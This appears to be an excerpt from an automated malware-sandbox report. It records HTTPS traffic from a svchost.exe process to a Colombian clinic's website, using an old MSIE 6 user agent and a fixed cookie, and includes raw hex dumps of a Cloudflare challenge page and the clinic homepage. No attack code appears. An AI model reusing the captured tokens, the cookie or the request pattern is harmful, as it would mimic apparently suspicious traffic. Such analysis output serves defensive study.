                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1175INData Raw: 31 65 62 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ebc<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1175INData Raw: 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: ,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1177INData Raw: 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 34 47 69 72 79 4b 39 50 6a 4c 4d 6b 67 37 7a 45 64 6d 4c 79 46 61 4c 37 69 72 65 78 38 30 70 7a 4b 5f 51 51 78 44 68 54 51 68 6f 2d 31 36 37 38 34 33 31 33 37 39 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 5a 62 37 66 45 77 33 4b 75 32 30 50 6e 30 36 76 53 57 6f 68 33 55 77 39 72 74 73 31 73 39 47 59 6f 4a 33 78 7a 4f 5a 65 70 74 55 2d 31 36 37 38 34 33 31 33 37 39 2d 30 2d 41 56
                                                                                                                                                                                                                                                                        Data Ascii: "/?__cf_chl_f_tk=4GiryK9PjLMkg7zEdmLyFaL7irex80pzK_QQxDhTQho-1678431379-0-gaNycGzNCRA" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="Zb7fEw3Ku20Pn06vSWoh3Uw9rts1s9GYoJ3xzOZeptU-1678431379-0-AV
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1178INData Raw: 71 5a 67 4c 70 77 6b 65 73 67 57 33 77 4c 37 65 7a 36 59 69 48 61 4e 67 36 54 71 35 36 68 43 71 5a 6f 43 62 4f 4c 56 6b 4f 32 63 36 64 43 71 4e 69 4a 43 74 2d 70 6a 54 4c 4d 4c 39 58 4b 77 39 38 6d 4c 38 68 4a 2d 6b 36 58 59 75 63 2d 43 6f 50 72 65 66 69 38 6d 6d 35 63 41 62 62 63 35 46 48 54 78 7a 39 32 6d 4e 72 77 5a 74 4c 6e 47 4b 46 6f 73 67 44 75 35 52 77 4a 52 41 66 56 32 4e 2d 4d 43 59 6e 43 67 6a 4b 49 62 57 31 34 74 73 54 72 57 64 66 75 65 76 50 79 41 62 77 7a 74 67 77 30 34 4d 74 6b 39 5f 45 56 44 37 65 31 5f 49 62 74 55 36 6a 55 39 45 75 4b 45 6b 6e 4f 45 51 31 71 53 62 4d 7a 61 44 57 49 38 65 69 4a 64 72 5a 64 78 70 5a 4d 45 4a 6e 55 64 55 56 71 6e 36 59 73 70 6f 73 75 35 61 49 42 31 51 5f 70 4f 30 6b 56 70 77 46 7a 65 41 6f 64 77 45 4e 45 32
                                                                                                                                                                                                                                                                        Data Ascii: qZgLpwkesgW3wL7ez6YiHaNg6Tq56hCqZoCbOLVkO2c6dCqNiJCt-pjTLML9XKw98mL8hJ-k6XYuc-CoPrefi8mm5cAbbc5FHTxz92mNrwZtLnGKFosgDu5RwJRAfV2N-MCYnCgjKIbW14tsTrWdfuevPyAbwztgw04Mtk9_EVD7e1_IbtU6jU9EuKEknOEQ1qSbMzaDWI8eiJdrZdxpZMEJnUdUVqn6Ysposu5aIB1Q_pO0kVpwFzeAodwENE2
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1179INData Raw: 61 79 3a 20 27 37 61 35 39 61 38 33 38 31 65 36 35 39 62 36 33 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 63 35 35 31 33 35 32 31 66 34 30 30 63 64 33 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 34 47 69 72 79 4b 39 50 6a 4c 4d 6b 67 37 7a 45 64 6d 4c 79 46 61 4c 37 69 72 65 78 38 30 70 7a 4b 5f 51 51 78 44 68 54 51 68 6f 2d 31 36 37 38 34 33 31 33 37 39 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a 20 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: ay: '7a59a8381e659b63', cHash: 'c5513521f400cd3', cUPMDTk: "\/?__cf_chl_tk=4GiryK9PjLMkg7zEdmLyFaL7irex80pzK_QQxDhTQho-1678431379-0-gaNycGzNCRA", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1181INData Raw: 61 36 4d 4a 67 51 42 4a 6d 65 6e 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 64 55 54 47 50 42 35 4b 53 45 78 59 44 37 62 52 42 48 52 57 41 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41 4c 37 73 6b
                                                                                                                                                                                                                                                                        Data Ascii: a6MJgQBJmenQ==', i2: 'dUTGPB5KSExYD7bRBHRWAQ==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhAL7sk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1182INData Raw: 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66
                                                                                                                                                                                                                                                                        Data Ascii: UHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="contentinf
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1183INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        73192.168.2.656976104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                        Cookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1186INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:19 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:56:19 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HzpQyrOw5JTo3JKV3FJgfy8pcN1ySAzBkOG7xyPA0TJh3QB%2FPT9w9dPTm6D04L%2FJWlACGrWxCR8k5fScFht7gmAr%2F0v5NUZ6kgnw5dmbEzMBK95Q%2B0Ydm6YxmURHBWhSylwe5KsdG0Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8395aa49b51-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1186INData Raw: 37 63 61 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                        Data Ascii: 7caf<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1187INData Raw: 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61
                                                                                                                                                                                                                                                                        Data Ascii: mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/templa
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1188INData Raw: 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74 73 74 72 61
                                                                                                                                                                                                                                                                        Data Ascii: /mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/bootstra
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1190INData Raw: 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 67 61 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="gant
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1191INData Raw: 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69
                                                                                                                                                                                                                                                                        Data Ascii: ize-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard "><di
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1192INData Raw: 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c
                                                                                                                                                                                                                                                                        Data Ascii: m g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"> <span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><li cl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1194INData Raw: 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                        Data Ascii: </ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent=""> <span class="g-separator g-menu-item-content"> <span class="g-menu-it
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1195INData Raw: 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d
                                                                                                                                                                                                                                                                        Data Ascii: -menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-item-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1196INData Raw: 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e
                                                                                                                                                                                                                                                                        Data Ascii: -item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1198INData Raw: 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e
                                                                                                                                                                                                                                                                        Data Ascii: er" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a></li>
